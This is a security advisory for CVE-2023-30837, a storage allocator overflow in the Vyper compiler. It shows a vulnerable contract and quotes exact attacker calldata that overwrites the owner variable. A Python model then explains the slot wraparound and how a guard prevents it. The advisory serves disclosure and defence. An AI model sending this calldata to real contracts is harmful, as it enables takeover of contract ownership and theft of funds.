CVE-2023-30837: vyper vulnerable to storage allocator overflow
Impact
The storage allocator does not guard against allocation overflows. This can result in vulnerabilities like the following:
```vyper
owner: public(address)
take_up_some_space: public(uint256[10])
buffer: public(uint256[max_value(uint256)])

@external
def initialize():
    self.owner = msg.sender

@external
def foo(idx: uint256, data: uint256):
    self.buffer[idx] = data
```
Per @toonvanhove, “An attacker can overwrite the owner variable by calling this contract with calldata: `0x04bc52f8 fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff` (spaces inserted for readability). `0x04bc52f8` is the selector for `foo(uint256, uint256)`, and the last argument `fff...fff` is the new value for the owner variable.”
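To make the missing check concrete, here is an added Python model (not code from the Vyper compiler) of a slot allocator for the layout above, run once without and once with an overflow guard; the class and function names are this example's own.

```python
# Minimal model of a storage allocator that hands out consecutive 256-bit
# slots to contract variables. This is illustrative code, not Vyper's own.
WORD = 2**256  # number of addressable storage slots in the EVM


class StorageAllocator:
    """Allocates contiguous slot ranges; guard=True rejects any layout
    whose total size does not fit in the 2**256-slot address space."""

    def __init__(self, guard: bool):
        self.guard = guard
        self.next_slot = 0
        self.layout = {}  # name -> (base slot, number of slots)

    def allocate(self, name: str, n_slots: int) -> int:
        base = self.next_slot
        end = base + n_slots
        if self.guard and end > WORD:
            raise OverflowError(f"{name}: storage allocation overflows slot space")
        self.layout[name] = (base, n_slots)
        self.next_slot = end
        return base


def slot_of(layout: dict, name: str, idx: int) -> int:
    """Slot an element access lands on. The EVM truncates the computed
    address to 256 bits, so base + idx can wrap back to low slots."""
    base, _ = layout[name]
    return (base + idx) % WORD


def vulnerable_layout() -> dict:
    """Layout of the contract above under an unguarded allocator."""
    alloc = StorageAllocator(guard=False)
    alloc.allocate("owner", 1)
    alloc.allocate("take_up_some_space", 10)
    alloc.allocate("buffer", WORD - 1)  # uint256[max_value(uint256)]
    return alloc.layout


def guarded_layout_rejects() -> bool:
    """True if a guarded allocator refuses the oversized buffer."""
    alloc = StorageAllocator(guard=True)
    alloc.allocate("owner", 1)
    alloc.allocate("take_up_some_space", 10)
    try:
        alloc.allocate("buffer", WORD - 1)
    except OverflowError:
        return True
    return False
```

With the unguarded layout, buffer starts at slot 11, so the index 0xff...f5 (2**256 - 11) wraps the slot address to 0, which is where owner lives; the guarded allocator rejects the layout at compile time instead.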